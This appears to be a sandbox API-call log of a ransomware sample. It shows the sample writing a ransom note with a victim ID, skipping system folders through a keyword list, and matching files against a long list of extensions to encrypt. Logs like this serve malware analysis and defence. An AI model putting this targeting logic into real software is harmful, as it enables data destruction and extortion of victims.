	[0170.319] CloseHandle (hObject=0x384) returned 1
	[0170.320] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.320] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.320] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.321] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0170.323] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.323] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0170.323] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.324] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.324] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0170.324] CloseHandle (hObject=0x384) returned 1
	[0170.324] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MapData\\*.*" (normalized: "c:\\users\\all users\\microsoft\\mapdata\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f0b806d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.325] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MapData\\*.*") returned 40
	[0170.325] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.325] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MapData\\*.*", cchLength=0x28 | out: lpsz="c:\\users\\all users\\microsoft\\mapdata\\*.*") returned 0x28
	[0170.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.325] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="windows") returned 0x0
	[0170.325] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.326] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="boot") returned 0x0
	[0170.326] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.326] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="system volume information") returned 0x0
	[0170.326] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.326] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.326] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.326] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="temp") returned 0x0
	[0170.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.327] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="program files") returned 0x0
	[0170.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.327] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.327] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="appdata") returned 0x0
	[0170.327] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="application data") returned 0x0
	[0170.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="winnt") returned 0x0
	[0170.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="tmp") returned 0x0
	[0170.328] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.328] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="cache") returned 0x0
	[0170.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="webcache") returned 0x0
	[0170.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.329] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="inetcache") returned 0x0
	[0170.329] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="nvidia") returned 0x0
	[0170.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="packages") returned 0x0
	[0170.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="cookies") returned 0x0
	[0170.330] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.330] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mapdata\\*.*", lpSrch="programdata") returned 0x0
	[0170.331] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.331] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.331] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7f0b806d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.331] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.331] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0b806d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f0b806d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f0de079, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.331] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0b806d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f0b806d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f0b806d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.331] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f0b806d, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7f0b806d, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7f0b806d, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0170.331] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.332] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.333] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MF", cAlternateFileName="")) returned 1
	[0170.333] lstrcmpW (lpString1="MF", lpString2="..") returned 1
	[0170.333] lstrcmpW (lpString1="MF", lpString2=".") returned 1
	[0170.333] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0170.333] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0170.333] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="MF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF") returned="C:\\Users\\All Users\\Microsoft\\MF"
	[0170.333] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\MF" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF") returned="C:\\Users\\All Users\\Microsoft\\MF"
	[0170.334] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MF", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\") returned="C:\\Users\\All Users\\Microsoft\\MF\\"
	[0170.334] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\") returned="C:\\Users\\All Users\\Microsoft\\MF\\"
	[0170.334] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned="C:\\Users\\All Users\\Microsoft\\MF\\*.*"
	[0170.334] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\MF\\*.*" (normalized: "c:\\users\\all users\\microsoft\\mf\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.334] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\*.*") returned 35
	[0170.335] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.335] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\*.*", cchLength=0x23 | out: lpsz="c:\\users\\all users\\microsoft\\mf\\*.*") returned 0x23
	[0170.335] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.335] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="windows") returned 0x0
	[0170.335] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.335] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="boot") returned 0x0
	[0170.335] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="system volume information") returned 0x0
	[0170.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="temp") returned 0x0
	[0170.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="program files") returned 0x0
	[0170.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="appdata") returned 0x0
	[0170.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.422] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="application data") returned 0x0
	[0170.423] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.423] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="winnt") returned 0x0
	[0170.423] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.423] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="tmp") returned 0x0
	[0170.423] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="cache") returned 0x0
	[0170.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="webcache") returned 0x0
	[0170.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.424] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="inetcache") returned 0x0
	[0170.424] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="nvidia") returned 0x0
	[0170.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="packages") returned 0x0
	[0170.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="cookies") returned 0x0
	[0170.425] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.425] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\*.*", lpSrch="programdata") returned 0x0
	[0170.426] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x35da50f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.426] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Active.GRL", cAlternateFileName="")) returned 1
	[0170.426] lstrcmpW (lpString1="Active.GRL", lpString2="..") returned 1
	[0170.426] lstrcmpW (lpString1="Active.GRL", lpString2=".") returned 1
	[0170.426] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\All Users\\Microsoft\\MF\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\") returned="C:\\Users\\All Users\\Microsoft\\MF\\"
	[0170.426] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\", lpString2="Active.GRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL"
	[0170.426] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL") returned 42
	[0170.426] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.427] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\MF\\Active.GRL", cchLength=0x2a | out: lpsz="c:\\users\\all users\\microsoft\\mf\\active.grl") returned 0x2a
	[0170.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.427] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\mf\\active.grl", lpSrch="help_decrypt_your_files") returned 0x0
	[0170.427] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\all users\\microsoft\\mf\\active.grl" | out: lpString1="c:\\users\\all users\\microsoft\\mf\\active.grl") returned="c:\\users\\all users\\microsoft\\mf\\active.grl"
	[0170.427] lstrlenW (lpString="c:\\users\\all users\\microsoft\\mf\\active.grl") returned 42
	[0170.427] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.427] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.428] StrStrW (lpFirst=".grl", lpSrch=".") returned=".grl"
	[0170.428] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.428] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".grl") returned 0x0
